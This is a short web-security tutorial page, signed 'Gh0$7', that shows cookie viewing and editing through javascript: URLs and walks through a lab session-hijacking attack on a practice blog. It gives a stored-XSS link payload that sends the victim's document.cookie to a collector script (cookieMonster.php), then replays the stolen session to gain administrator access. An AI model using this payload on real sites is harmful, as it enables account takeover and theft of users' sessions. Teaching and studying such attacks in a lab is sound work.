XSS & CSRFIFrame InjectionRFI & LFIFlashCode Injection & CookiesTutorials & Walkthroughs

Cookies, Code Injection and Session Hijacking

Code Injection: There are many ways to inject code, let's begin this section with cookie viewing and editing. Erase everything in your address bar, and type in javascript:alert(document.cookie);
Carefully examine the data
Now erase everything again and type javascript: void(document.cookie='user:=guest');
Run the original script again to view the cookie, as you can see you have changed the cookie data. This is how cookie editing can be used to possibly access a site through cookies. There are many tools that can be used to help automate this process such as: Paros Proxy, Burp Suite, and Web Scarab to name a few.
There are better ways to achieve this in a more targeted manner. Let's move on.

Session Hijacking:
Let's revisit the blog and see what we can do.
1) Open a different web browser and point it to the main page.
2) Log in to the anonymous account with the attack browser and create a post with a hyperlink in the blog that points to the cookie stealing code that i have created, the file is named cookieMonster.php the XSS link should look like this <a onclick="javascript:document.location='/ghost/cookieMonster.php?monster='+document.cookie;">Pics</a>
3) Log in as the administrator with the victim browser, view the post and click on the hyperlink
4) Go back to the attackers browser and go to mycookies.html
As you can see there is a new session that has been logged take the javascript from the page and insert it into the address bar. Go back to the blog and post a new message, as you can see you are now the administrator. This example is a little different from real world examples in the aspect that a lot of the time user authentication through sessions and cookies are either randomly generated, or the number is based on a mathematical algorithm. There are programs out there than can help try to predict the users next session id.

Developed By: Gh0$7